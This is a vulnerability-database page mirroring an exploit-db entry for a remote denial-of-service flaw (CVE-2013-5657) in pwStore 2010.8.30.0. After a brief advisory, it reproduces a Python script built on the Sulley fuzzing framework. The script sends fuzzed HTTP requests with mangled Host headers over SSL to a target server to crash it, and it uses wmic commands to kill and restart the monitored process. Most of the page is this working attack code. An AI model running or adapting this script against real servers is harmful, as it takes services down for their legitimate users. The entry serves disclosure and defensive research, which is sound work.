Lucene search
+L

Pwstore - Denial of Service

🗓️ 16 Apr 2013 00:00:00Reported by Josep Pi RodriguezType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 24 Views

Pwstore application can crash, denying service to legitimate user

Related
Code
ReporterTitlePublishedViews
Family
0day.today
PWStore 2010.8.30.0 Cross Site Scripting / Denial Of Service
3 Sep 201300:00
zdt
ATTACKERKB
CVE-2013-5657
7 Jan 202017:15
attackerkb
Circl
CVE-2013-5657
16 Apr 201300:00
circl
CVE
CVE-2013-5657
7 Jan 202016:41
cve
Cvelist
CVE-2013-5657
7 Jan 202016:41
cvelist
NVD
CVE-2013-5657
7 Jan 202017:15
nvd
Prion
Cross site request forgery (csrf)
7 Jan 202017:15
prion
RedhatCVE
CVE-2013-5657
22 May 202511:26
redhatcve
source: https://www.securityfocus.com/bid/62112/info

pwStore is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to crash the application, denying service to legitimate users.

pwStore 2010.8.30.0 is vulnerable; other versions may also be affected.

#!/usr/bin/env python
from sulley import *
import sys
import time

s_initialize("HTTP")

s_static("GET / HTTP/1.1\r\n")
s_static("Host")
s_static(":\x0d\x0a")
s_static(" ")
s_string("192.168.1.39")
s_static("\r\n")
s_static("\r\n")

print "Instantiating session"
sess = sessions.session(session_filename="https_pwstore.session", proto="ssl", sleep_time=0.50)
print "Instantiating target"
target = sessions.target("192.168.1.39", 443)
#target.procmon = pedrpc.client("127.0.0.1", 26002)
#target.netmon = pedrpc.client("127.0.0.1", 26001)

target.procmon_options =  {
    "proc_name" : "savant.exe",
    "stop_commands" : ['wmic process where (name="savant.exe") delete"'],
    "start_commands" : ['C:\\savant\\savant.exe'],
}


print "Adding target"
sess.add_target(target)

print "Building graph"
sess.connect(s_get("HTTP"))

print "Starting fuzzing now"
sess.fuzz()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Nov 2015 00:00Current
7.3High risk
Vulners AI Score7.3
CVSS 25
CVSS 3.17.5
EPSS0.06848
24